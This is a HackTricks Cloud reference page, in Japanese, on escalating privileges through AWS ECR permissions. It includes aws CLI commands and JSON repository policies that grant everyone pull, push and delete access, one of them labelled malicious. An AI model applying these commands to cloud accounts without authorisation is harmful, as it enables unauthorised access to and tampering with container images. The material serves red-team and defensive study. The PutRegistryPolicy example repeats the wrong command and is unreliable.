AWS - ECR Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

ECR

`ecr:GetAuthorizationToken`,`ecr:BatchGetImage`

ecr:GetAuthorizationToken と ecr:BatchGetImage の権限を持つ攻撃者は、ECRにログインしてイメージをダウンロードできます。

イメージのダウンロード方法についての詳細は以下を参照してください：

AWS - ECR Post Exploitation

潜在的な影響： トラフィック内の機密情報を傍受することによる間接的な権限昇格。

`ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`

これらすべての権限を持つ攻撃者は、ECRにログインしてイメージをアップロードできます。これは、これらのイメージが使用されている他の環境への権限昇格に役立ちます。

新しいイメージをアップロードまたは更新する方法については、以下を確認してください：

AWS - EKS Enum

`ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart`

前のセクションと同様ですが、公開リポジトリ用です。

`ecr:SetRepositoryPolicy`

この権限を持つ攻撃者は、リポジトリのポリシーを変更して、自分自身（または全員）に読み書きアクセスを付与することができます。例えば、この例では全員に読み取りアクセスが付与されています。

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

my-policy.jsonの内容：

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

`ecr-public:SetRepositoryPolicy`

前のセクションと同様ですが、パブリックリポジトリ用です。攻撃者はECRパブリックリポジトリのリポジトリポリシーを変更して、不正なパブリックアクセスを付与したり、権限を昇格させたりすることができます。

bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

潜在的な影響: ECR Public リポジトリへの不正な公開アクセスにより、任意のユーザーがイメージをプッシュ、プル、または削除できるようになります。

`ecr:PutRegistryPolicy`

この権限を持つ攻撃者は、レジストリポリシーを変更して、自分自身、彼のアカウント（または全員）に読み書きアクセスを付与することができます。

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

AWSハッキングを学び、実践する：HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングを学び、実践する：HackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
ハッキングのトリックを共有するには、HackTricksとHackTricks CloudのGitHubリポジトリにPRを送信してください。

PreviousAWS - EC2 Privesc NextAWS - ECS Privesc

Last updated 1 month ago